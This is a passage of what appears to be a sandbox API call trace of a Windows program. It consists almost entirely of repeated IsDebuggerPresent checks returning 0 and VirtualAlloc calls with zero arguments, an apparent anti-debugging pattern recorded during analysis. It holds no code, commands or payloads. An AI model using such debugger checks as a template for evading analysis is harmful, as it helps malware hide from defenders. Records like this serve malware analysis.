(lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.623] IsDebuggerPresent () returned 0 [0050.624] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] IsDebuggerPresent () returned 0 [0050.624] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.624] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.625] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] IsDebuggerPresent () returned 0 [0050.626] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.627] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.628] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.629] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] IsDebuggerPresent () returned 0 [0050.630] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.630] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] IsDebuggerPresent () returned 0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.631] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.632] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.633] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.634] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.635] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.636] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.637] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] 